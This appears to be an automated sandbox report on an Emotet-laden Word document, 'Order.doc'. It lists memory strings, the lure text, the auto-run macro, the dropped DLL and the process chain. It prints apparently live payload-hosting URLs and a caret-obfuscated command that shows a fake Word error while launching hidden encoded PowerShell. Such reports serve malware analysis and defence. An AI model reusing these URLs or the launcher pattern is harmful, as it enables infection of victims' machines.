Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2090020372.000000000048A000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Yara detected Emotet

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page: I of I , words: 8,362 , ,3 , N@m 13 ;a 10096 G)
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page: I of I , words: 8,362 , ,3 , N@m 13 ;a 10096 G) FI G) ,, ' i " " Kk
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
Very long command line found
Source: unknown Process created: Commandline size = 5413
Source: unknown Process created: Commandline size = 5312
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5312
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fceveflzqtqcb\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC4A5 9_2_001FC4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E6CA5 9_2_001E6CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E92A3 9_2_001E92A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EE8DD 9_2_001EE8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9EDA 9_2_001F9EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB8D8 9_2_001EB8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FA6D9 9_2_001FA6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F08CF 9_2_001F08CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F34C3 9_2_001F34C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F38C2 9_2_001F38C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F00FE 9_2_001F00FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F14FC 9_2_001F14FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F66FB 9_2_001F66FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E50F1 9_2_001E50F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E68EC 9_2_001E68EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E30E8 9_2_001E30E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F891E 9_2_001F891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F2515 9_2_001F2515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB10A 9_2_001EB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB706 9_2_001FB706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4304 9_2_001E4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD138 9_2_001FD138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9333 9_2_001F9333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7132 9_2_001F7132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EEF2E 9_2_001EEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EF52E 9_2_001EF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EFF2C 9_2_001EFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3D29 9_2_001F3D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E3523 9_2_001E3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EA323 9_2_001EA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC15B 9_2_001FC15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6158 9_2_001F6158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EEB54 9_2_001EEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E2353 9_2_001E2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4D48 9_2_001E4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E177C 9_2_001E177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E0D7A 9_2_001E0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F2179 9_2_001F2179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1372 9_2_001F1372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E2B70 9_2_001E2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB165 9_2_001FB165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E5D63 9_2_001E5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F819F 9_2_001F819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EF797 9_2_001EF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9D95 9_2_001E9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EF793 9_2_001EF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E498C 9_2_001E498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E598B 9_2_001E598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EDB86 9_2_001EDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E1983 9_2_001E1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E3DB8 9_2_001E3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ED5B8 9_2_001ED5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F41AB 9_2_001F41AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7FA7 9_2_001F7FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1BA5 9_2_001F1BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC5A1 9_2_001FC5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ED3F5 9_2_001ED3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E27F3 9_2_001E27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB3E8 9_2_001EB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EFBE6 9_2_001EFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0043303C 9_2_0043303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00441E14 9_2_00441E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A821 10_2_0028A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00286417 10_2_00286417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00284844 10_2_00284844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00295250 10_2_00295250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028CAA3 10_2_0028CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029A0F1 10_2_0029A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028D2DD 10_2_0028D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00285F04 10_2_00285F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029434E 10_2_0029434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002947B5 10_2_002947B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00290B8A 10_2_00290B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00284D90 10_2_00284D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029CBE7 10_2_0029CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00298C2B 10_2_00298C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029D02D 10_2_0029D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00290223 10_2_00290223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00292631 10_2_00292631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00298A33 10_2_00298A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00294C37 10_2_00294C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00282208 10_2_00282208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028240F 10_2_0028240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00292C05 10_2_00292C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00281806 10_2_00281806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00285418 10_2_00285418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028E612 10_2_0028E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029AA7B 10_2_0029AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028327F 10_2_0028327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00290672 10_2_00290672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028BE74 10_2_0028BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028E044 10_2_0028E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028DE81 10_2_0028DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00294A9E 10_2_00294A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00291090 10_2_00291090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029D4E1 10_2_0029D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028ECFE 10_2_0028ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028D6F0 10_2_0028D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A6C9 10_2_0028A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029C6D9 10_2_0029C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A2D2 10_2_0028A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00289D2F 10_2_00289D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028A525 10_2_0028A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283938 10_2_00283938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287B39 10_2_00287B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029CF31 10_2_0029CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287731 10_2_00287731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283336 10_2_00283336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029D70B 10_2_0029D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00294F04 10_2_00294F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00289106 10_2_00289106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028F369 10_2_0028F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028C364 10_2_0028C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029B165 10_2_0029B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029A966 10_2_0029A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287378 10_2_00287378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00285B7D 10_2_00285B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283B74 10_2_00283B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00299B4A 10_2_00299B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00293F4F 10_2_00293F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028C145 10_2_0028C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029135B 10_2_0029135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002993AA 10_2_002993AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283FAF 10_2_00283FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028ADAF 10_2_0028ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00292FA1 10_2_00292FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002909B8 10_2_002909B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028F9BA 10_2_0028F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028FFBA 10_2_0028FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00299DBF 10_2_00299DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00297BBE 10_2_00297BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00291F88 10_2_00291F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00297187 10_2_00297187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00293590 10_2_00293590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029C192 10_2_0029C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028BB96 10_2_0028BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002867EF 10_2_002867EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0028F5E0 10_2_0028F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00296BE4 10_2_00296BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002835FC 10_2_002835FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00287FFE 10_2_00287FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00291DFE 10_2_00291DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029BBF1 10_2_0029BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0029DBC4 10_2_0029DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00282DDF 10_2_00282DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002857D4 10_2_002857D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00209C3D 10_2_00209C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210604 10_2_00210604
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Order.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Order.doc OLE indicator, VBA macros: true
PE file contains strange resources
Source: J47K.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@20/8@2/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$Order.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBF29.tmp
Source: Order.doc OLE indicator, Word Document stream: true
Source: Order.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....x,................#.............}..v.....,......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................v.j....E.h...............#.............}..v....@<......0.N...............`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................v.j....E.h...............#.............}..v.....z......0.N...............`.............|............... Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: Order.doc Virustotal: Detection: 32%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
